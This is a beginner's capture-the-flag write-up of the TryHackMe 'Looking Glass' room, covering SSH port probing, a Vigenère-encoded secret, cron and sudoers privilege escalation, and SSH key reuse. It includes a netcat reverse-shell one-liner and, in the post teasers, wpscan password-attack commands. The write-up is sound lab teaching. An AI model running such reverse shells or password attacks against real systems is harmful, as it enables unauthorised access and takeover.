LOOKING GLASS Write-up | TryHackMe | by Valerie23

LOOKING GLASS:https://tryhackme.com/room/lookingglass 

NMAP

Starting with a simple nmap scan to see which ports are open and what services are running on these ports.
Nmap scan results in a long list of open ports ranging from 9000 to 13783. And the ssh service is running on all these ports so lets try connecting to one of the Dropbear ports (for username - you can use any random name).


When we try connecting to port 9000 it tells us to go "lower" which we cannot do since 9000 is the lowermost open port (apart from 22). And when we try connecting to the uppermost open port 13783 , it tell us to go higher which is again impossible.

So now we visit tryhackme again and take the hint given in user flag which says "A looking glass is a mirror" .

So the output messages are mirrored. When it prints "LOWER" we actually need to go higher and vice-versa.

So lets try to find the real port while shrinking the range





 ssh toii@10.10.128.154 -o StrictHostKeyChecking=no -p 12373

We have finally found our real port 12373
But has given us an encoded piece of text and is asking for a secret.



Lets try to decode the text. At first glance it looks somewhat like ROT13. But this is actually "Vignere Cipher". To decode a Vignere Cipher we usually need a key. Thanks to this website that automatically detects the possible keys:

https://www.boxentriq.com/code-breaking/vigenere-cipher

Copy the cipher in the output message and paste it on the website it will give you the key and probably half of the decoded text. Try decoding the cipher again (this time with the key) to get the secret.

The last line of the cipher contains the secret:

Your secret is : bewar**********wock
SSH

Enter the secret to receive SSH credentials.

NOTE: These credentials will change everytime. So you will have to find your own as these will not work for you.

Now we can connect to the ssh and gain the user flag.
We will find a mirrored user flag. To receive the original flag use the command:
echo <flag> | rev

PRIVILEGE ESCALATION

USER 1

Using sudo -l

Now we know that we can execute /sbin/reboot with root permissions.
Lets look at the crontab now.

Here we can see that a script twasBrilling.sh gets executed everytime the system is rebooted.
Lets see if we have permissions to alter the contents of twasBrilling.sh
And the answer is yes, so now we can put reverse shell inside it.
We can take help of this website for
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We used
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


In tweedledum's home directory we can see a file named humptydumpty.txt.
It contains a hash , lets try and crack it on
crackstation.net

looks like the last hash is the password for user humptydumpty
So we copied the hash and pasted it on http://icyberchef.com/ to try and decode it. Finally we cracked it by converting it from hex. Then with the cracked password we escalated our privileges to root.
su humptydumpty

USER 2

There is a file named "poetry.txt" in humptydumpty's home directory.
But unfortunately there is no clue in it.
Lets visit other user's directory. Alice's directory contains ssh key, we can use this to connect to alice's ssh account.
So lets copy this file into our system and change its permissions using chmod 600 filename
then connect using the command:
ssh -i alicekey alice@10.10.170.193

USER 3

Alice's directory contains a kitten.txt file but again there is no hint inside it for furthur escalation.
So we try viewing tweedledee's directory sadly we don't have permissions to do so.
And we cannot run sudo -l since we don't have alice's password>
So we can try viewing sudoers file instead.

Here we can run /bin/bash as root using ssalg-gnikool as host .
s use sudo --help to find the flag used for specifying host,
we get to know that -h about -h flag, lets make use of it.

ROOT



Again we will receive a mirrored flag, and using the same command as before we can gain the original flag.


I have tried to include a lot of details to make it possible for even the beginners to complete the room while learning new things.

                                                                       -by Valerie23

Comments

Post a Comment

Popular posts from this blog

THM: Blog Room Writeup

Image
Here is the link of this great room:  Blog by Nameless0ne . L et's start guys.. Enumeration First I ran the nmap scan: 1.First lets check out the Blog itself running on the port 80. From little enumeration we can say that this is a simple blog running on the Wordpress. 2. The blog contains a single post by a user named Karen Wheeler for Billy joel. 3. To enumerate the users on the blog I will be using WPscan.           wpscan --url blog.thm -e u This command will list all the users on the Blog, bjoel & kwheel. 4. Let's try to find out the password of these users using the same tool again.          wpscan -U username --password <pass file> -t 30 --password-attack wp-login --url blog.thm 5. Try to run your own command. It won't take long before the password pops. (hint: try Mom name) 6. After login into the wordpress I saw the user had very limited capabilities so there must be some other way to the shell or some k...
Read more

GamingServer | TryHackMe | by Valerie23

Image
LINK TO THE ROOM:  GamingServer NMAP SCAN Let’s do nmap first and see what do we get. nmap -Pn -sV 10.10.159.106 The results come back showing : Port 22 & 80. Since we don't have any credentials lets enumerate port 80 first. GOBUSTER  Lets fireup a gobuster scan for finding hidden directories. gobuster dir -u http://10.10.159.106/ -w /usr/share/wordlists/dirb/common.txt -t 50 WEB ANALYSIS Visiting port 80. And checking its source code gives us a username. Lets visit some of the interesting directories that we found earlier from gobuster scan. /uploads It has a dictionary list that looks like a list of passwords. So we will just copy and paste the content into a new file. And now we are going to visit another directory /secret to find the secrets. Looks like a ssh key but encrypted. In order to decrypt the ssh key we first need to copy and paste it into a file then find its password. Used commands: locate ssh2john /usr/share/john/ssh2john.py sshkey > key_hash Now the fil...
Read more